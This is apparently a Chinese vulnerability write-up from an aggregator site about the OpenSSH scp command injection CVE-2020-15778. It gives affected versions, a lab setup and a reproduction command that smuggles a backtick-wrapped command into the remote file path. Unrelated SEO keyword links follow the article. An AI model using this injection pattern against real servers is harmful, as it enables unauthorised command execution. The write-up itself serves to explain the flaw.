OpenSSH命令注入漏洞CVE-2020-15778该如何分析
发表于:2025-01-20 作者:千家信息网编辑
千家信息网最后更新 2025年01月20日,OpenSSH命令注入漏洞CVE-2020-15778该如何分析,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。漏洞介绍SCP(sec
千家信息网最后更新 2025年01月20日OpenSSH命令注入漏洞CVE-2020-15778该如何分析影响版本
OpenSSH命令注入漏洞CVE-2020-15778该如何分析,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。
漏洞介绍
SCP(secure copy)是linux系统下基于ssh登录进行安全远程文件拷贝的命令,可以在linux之间复制文件和目录。
OpenSSH中小于 8.3p1版本 SCP命令里存在命令注入漏洞。当将文件复制到远程服务器时,文件路径附加在本地scp命令的末尾,可以触发命令注入漏洞。
攻击者可以采用反引号(`)文件作为命令注入执行scp命令,命令将会发送到远程服务器并执行。
影响版本
version: <=openssh-8.3p1
复现环境
攻击机:192.168.20.101
靶机:192.168.20.102
利用场景:已知 ssh 密码为 docker
漏洞复现:
scp cve202015778.txt docker@192.168.20.102:'`touch /tmp/cve202015778.sh`tmp'#touch /tmp/cve202015778.sh`tmp' 单引号包裹全路径信息#touch /tmp/cve202015778.sh` 反引号包裹要执行的命令#中途需要身份验证,需要输入对应用户的密码
靶机查看信息
关于 OpenSSH命令注入漏洞CVE-2020-15778该如何分析问题的解答就分享到这里了,希望以上内容可以对大家有一定的帮助,如果你还有很多疑惑没有解开,可以关注行业资讯频道了解更多相关知识。
命令
漏洞
文件
分析
引号
问题
信息
包裹
密码
更多
服务器
版本
路径
靶机
帮助
攻击
服务
解答
易行
安全
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
西安智慧社区软件开发公司
上海ukey服务器端口
上海兆行网络技术有限公司
锡山区互联网智能科技产品供应
博物馆云平台软件开发
云顶哪个服务器不卡
网络安全宣传千人签名
怎么找软件开发能力强的人
任丘网络技术团队
apache网站服务器配置命令
证券网络安全责任追究
佳缘科技军工网络安全
大华存储服务器管理设置
客户数据库管理设计
杭州玖加壹网络技术有限
初中毕业自学网络安全工程师
邮件服务器种类
电脑上怎么上服务器未响应
宁波软件开发培训学校
c 数据库连接字
软件开发兼职渠道
服务器ip地址安全吗
数据库删除磁盘组
网络安全知识在哪里学
桌面程序用哪个数据库
java web数据库查询
qq邮箱服务器地址csdn
服务器运维管理系统好处
定远特定软件开发技术大概费用
node服务器间同步
